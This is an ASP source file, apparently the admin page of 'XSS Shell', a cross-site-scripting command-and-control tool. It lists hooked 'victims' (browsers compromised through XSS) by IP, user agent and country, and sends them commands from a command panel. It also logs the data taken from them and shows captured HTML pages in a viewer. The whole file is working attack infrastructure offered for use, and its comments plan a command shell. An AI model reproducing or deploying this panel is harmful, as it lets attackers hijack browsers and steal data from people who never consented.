  1. <%
  2. '09/08/2006
  3. ' - Started
  4. '
  5. ' 15/08/2006
  6. ' - Working alpha
  7. '
  8. '18/08/2006
  9. ' New UI
  10. '
  11. '31/10/2006
  12. ' Now supports activity and shows active zombies and drops non-active ones
  13. ' Multiple victim support with send and save
  14. ' Faster victim notification
  15. '01.04.2007
  16. ' - Logs replaced AttackID for XSS Tunnel compatibility
  17. ' TODO;
  18. ' - Log commands locally for analyze later
  19. ' + Build up connection interface 
  20. ' - Command Shell
  21. ' / Command Interface
  22. ' + Implement AJAX for interface (low pr)
  23. %>
  24. <!--#include file="db.asp" -->
  25. <%
  26. protected()
  27. Dim CallType
  28. CallType = fm_Qnstr("c")
  29. 'Call only logs
  30. Select Case CallType 
  31. Case 1
  32. Call Logs()
  33. Case 2
  34. Call Victims(False)
  35. Case 3 ' XSS Tunnel
  36. Call Victims(True)
  37. End Select
  38. '// Poor man's AJAX Calls
  39. If CallType > 0 Then Response.End
  40. Title = "XSS Shell Admin"
  41. %>
  42. <!--#include file="header.asp" -->
  43. <%
  44. Call ShowCommands()
  45. %>
  46. <div id="victims">
  47. <div id="victimsUpdater">
  48. <%Victims(False)%>
  49. </div>
  50. </div>
  51. <div id="logHolder">
  52. <h2>Logs</h2>
  53. <div id="log"></div>
  54. </div>
  55. <%
  56. Call Viewer()
  57. '---------------------------------------------------------------------------
  58. ' Helpers
  59. '---------------------------------------------------------------------------
  60. Sub Victims(ByVal XSSTunnel)
  61. Dim RsVic
  62. getRs RsVic, "SELECT TOP " & MAX_VICTIM & " Victim.IP, Victim.ID, Victim.VictimID, RequestTime, RawUserAgent, Data FROM Victim, VictimDetail WHERE VictimDetail.VictimID = Victim.VictimID AND lastseen >  DATEADD(""s"",-" & Activity & ",Now) ORDER BY Victim.ID DESC"
  63. If XSSTunnel Then 
  64. If Not RsVic.EOF And Not RsVic.BOF Then
  65. Response.Write fm_Encode(RsVic("VictimId"))
  66. Else
  67. Response.Write NO_RECORD
  68. End IF
  69. Response.End
  70. End If
  71. Response.Write "<h2>Victims</h2>" 
  72. Dim viclist, Starter
  73. While Not RsVic.EOF 
  74. PrintVictim(RsVic)
  75. If Starter Then viclist = viclist & ","
  76. viclist = viclist & fm_Encode(RsVic("VictimID"))
  77. Starter = True
  78. RsVic.MoveNext
  79. Wend
  80. Response.Write "[" & viclist
  81. fmKill RsVic
  82. End Sub
  83. Sub PrintVictim(ByVal Rs)
  84. Dim Data, ProxyData
  85. ProxyData = Rs("Data")
  86. If ProxyData <> "" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, "<br />")
  87. Data = Data & "<strong>Victim ID : </strong>" & fm_Encode(Rs("VictimID")) & "<br>"
  88. Data = Data & "<div class=code>" & fm_Encode(Rs("RawUserAgent")) & "</div>"
  89. If ProxyData <> "" Then Data = Data & "<div class=code>" & ProxyData & "</div>"
  90. Dim Checked 
  91. Checked = false
  92. With Response
  93. .Write "<div class=""commandl"" onmouseover=""hi(this)"" onmouseout=""lo(this)"" help=""" & Data & """ >"
  94. .Write "<img src=""mg/flags/" & GetCountry(Rs("IP")) & ".png"" alt=""" & GetCountry(Rs("IP")) & """ width=""20"" height=""13"" > "
  95. .Write Rs("IP") & " / " & fm_Encode(Rs("VictimID")) & "</div>"
  96. End With
  97. 'Response.Write "<ul><a href=""showdata.asp?i=" & Rs("ID") & "&m=1"">" & Rs("IP") & "</a> - <em>" & Rs("RequestTime") & "</em></ul>"
  98. End Sub
  100. '---------------------------------------------------------------------------
  101. ' Show Available Commands
  102. Sub ShowCommands()
  103. %>
  104. <div id="commands">
  105. <h2>Commands</h2>
  106. <%
  107. Dim i
  108. For i = 0 To UBound(Commands) Step 3
  109. Response.Write "<div id=""cmd" & i & """ class=""commandl"" onmouseover=""hi(this)"" onmouseout=""lo(this)""><a href=""javascript:;"" onclick=""sendCommand('" & Commands(i+1) & "');new Effect.Highlight(document.getElementById('cmd" & i & "'), '#ff0000')"">" & fm_Encode(Commands(i)) & "</a><br>" & Commands(i+2) & "</div>"
  110. Next 
  111. %>
  112. <hr /><strong>Parameters :</strong> <br />
  113. <textarea name="params" id="params" style="width:98%;height:80px"></textarea>
  114. <input type="hidden" id="victims" value="" />
  115. <hr />
  116. </div>
  117. <%
  118. End Sub
  119. ' VIEWER BOX
  120. '---------------------------------------------------------------------------
  121. ' Offline Content Viewer iframe 
  122. Sub Viewer()
  123. %>
  124. <div id="offlinebrowser">
  125. <h2>Viewer</h2>
  126. <iframe name="offlinebrw" id="offlinebrw" src="javascript:document.write('.');document.close()"></iframe>
  127. </div>
  128. <%
  129. End Sub
  130. ' LOGS BOX
  131. '---------------------------------------------------------------------------
  132. ' Show recent logs from victims
  133. Sub Logs()
  134. Dim RsLog
  135. getRs RsLog, "SELECT TOP " & DEFAULT_REC & " ID, Data, Type, AttackID, Shown FROM Log ORDER BY ID DESC"
  136. ' Response.Write "<h2>Logs : " & Minute(Now) & ":" & Second(Now) & "</h2>"
  137. Response.Write "<ol>"
  138. While Not RsLog.EOF 
  139. PrintLog(RsLog)
  140. RsLog.MoveNext
  141. Wend
  142. Response.Write "</ol>"
  143. fmKill RsLog
  144. End Sub
  145. ' Print and Format Logs
  146. Function PrintLog(ByVal Rs)
  147. Dim Value 
  148. If Rs("Data") <> "" Then
  149. Value = fm_Encode(Rs("Data"))
  150. Value = Replace(Value, "%7Bn%7D", "<br />")
  151. Value = Replace(Value, "%3Atrue", "%3A<strong>true</strong>")
  152. Else
  153. Value = Rs("AttackID") & "..."
  154. End If
  155. Dim CSSname
  156. '// Pushed
  157. If Rs("Shown") = 1 Then
  158. CSSname = "pushed"
  159. End If
  160. If Rs("Data") <> "" Then
  161. CSSname = "done"
  162. End If
  163. Value = "<span class=""" & CSSName & """>" & Value & "</span>"
  164. If Rs("Type") = HTMLPAGE Then
  165. Value = "<a href=""showdata.asp?i=" & Rs("AttackID") & """ target=""offlinebrw"">HTML</a> - " & Rs("AttackID")
  166. End If
  167. Response.Write "<li>" & Value & "</li>"
  168. End Function
  169. %>
  170. <!--#include file="footer.asp" -->